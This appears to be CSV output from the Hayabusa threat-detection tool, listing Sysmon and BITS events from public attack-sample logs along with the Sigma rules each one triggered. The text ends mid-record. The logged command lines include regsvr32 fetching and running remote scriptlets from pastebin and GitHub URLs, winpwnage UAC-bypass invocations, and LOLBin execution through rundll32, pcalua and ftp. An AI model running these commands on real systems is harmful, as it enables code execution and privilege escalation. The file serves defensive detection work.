365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:56:46.605 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\PerfStringBackup.INI | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:57:39.662 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MpIdleTask | Process: C:\Windows\system32\svchost.exe | PID: 968 | PGUID: 365ABB72-2522-5CD8-0000-001080D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 13:58:39.850 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 1256 | PGUID: 365ABB72-268F-5CD8-0000-0010F4A51700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 13:58:54.897 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2728 | PGUID: 365ABB72-269E-5CD8-0000-001084F81A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 13:58:54.897 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 14:18:03.589 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1364c | PID: 3320 | PGUID: 365ABB72-2B1B-5CD8-0000-0010CCC92500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 14:18:09.589 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 816 | PGUID: 365ABB72-2B21-5CD8-0000-001039DD2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 14:18:09.589 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 17:01:43.391 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 3788 | PGUID: 365ABB72-516B-5CD8-0000-001087E41600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-12 17:01:50.781 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | Process: C:\Windows\System32\pcalua.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 2952 | PGUID: 365ABB72-517E-5CD8-0000-001024D61700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-12 17:01:51.007 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 2920 | PGUID: 365ABB72-517E-5CD8-0000-00105FE01700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-12 17:01:51.007 +00:00,IEWIN7,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-12 17:09:02.275 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 1528 | PGUID: 365ABB72-532E-5CD8-0000-00106C222700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-12 17:09:02.275 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-12 17:09:02.275 +00:00,IEWIN7,1,medium,Evas,Code Execution via Pcwutl.dll,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-12 17:20:01.980 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 4092 | PGUID: 365ABB72-55C1-5CD8-0000-0010970D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-12 17:20:31.183 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 956 | PGUID: 365ABB72-55DF-5CD8-0000-001018532F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-12 17:20:49.443 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt | LID: 0x135f2 | PID: 2392 | PGUID: 365ABB72-55F1-5CD8-0000-0010781C3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-12 17:20:49.443 +00:00,IEWIN7,1,medium,Exec | Evas,Suspicious ftp.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-12 17:20:49.458 +00:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\system32\calc.exe | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 684 | PGUID: 365ABB72-55F1-5CD8-0000-00103D1E3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-12 18:04:50.121 +00:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: backdoor | URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-12 18:35:05.155 +00:00,IEWIN7,1,info,,Process Created,"Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13eee | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:35:05.155 +00:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:35:05.155 +00:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:35:05.780 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | LID: 0x13eee | PID: 1912 | PGUID: 365ABB72-6759-5CD8-0000-001085031000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:35:06.562 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49165 (IEWIN7..home) | Dst: 104.20.208.21:80 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:35:06.562 +00:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/net_connection_win_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:48:52.219 +00:00,IEWIN7,1,info,,Process Created,"Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | Process: C:\ProgramData\jabber.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13715 | PID: 1340 | PGUID: 365ABB72-6A94-5CD8-0000-00101BDB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-12 18:48:52.766 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | LID: 0x13715 | PID: 3880 | PGUID: 365ABB72-6A94-5CD8-0000-0010C2F10E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 14:50:59.389 +00:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: hola | URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-13 18:02:49.160 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mobsync.exe -Embedding | Process: C:\Windows\System32\mobsync.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1341d | PID: 3828 | PGUID: 365ABB72-B147-5CD9-0000-00109D4F0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:19.681 +00:00,IEWIN7,1,info,,Process Created,Cmd: /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x133de | PID: 2372 | PGUID: 365ABB72-B167-5CD9-0000-0010EE150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:19.681 +00:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x1341d | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:19.681 +00:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:19.681 +00:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:19.895 +00:00,IEWIN7,1,info,,Process Created,Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: /c notepad.exe | LID: 0x133de | PID: 2584 | PGUID: 365ABB72-B167-5CD9-0000-00109D240C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:21.212 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49159 (IEWIN7) | Dst: 151.101.128.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:21.212 +00:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/net_connection_win_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:05:18.692 +00:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 1188 | PGUID: 365ABB72-B1DE-5CD9-0000-0010715B0D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 00:29:52.744 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:58172 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 00:32:22.775 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55099 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 00:32:36.775 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55101 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 01:29:04.306 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mshta.exe -Embedding | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1070ce | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 01:29:04.306 +00:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 01:29:04.306 +00:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 01:29:04.306 +00:00,IEWIN7,1,high,Evas,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation_sysmon/proc_creation_win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 01:29:05.534 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49168 (IEWIN7) | Dst: 10.0.2.17:55683 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 02:32:48.290 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2676 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.290 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2676 | PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.290 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.290 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.290 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.359 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 3964 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.359 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 3964 | PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.359 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.359 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.359 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.143 +00:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 288 03573528 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3776 | PGUID: 365ABB72-28D3-5CDA-0000-0010B08B1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.453 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 1020 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.453 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 1020 | PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.453 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.470 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2768 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.470 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2768 | PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.470 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.487 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\explorer.exe | Tgt Process: 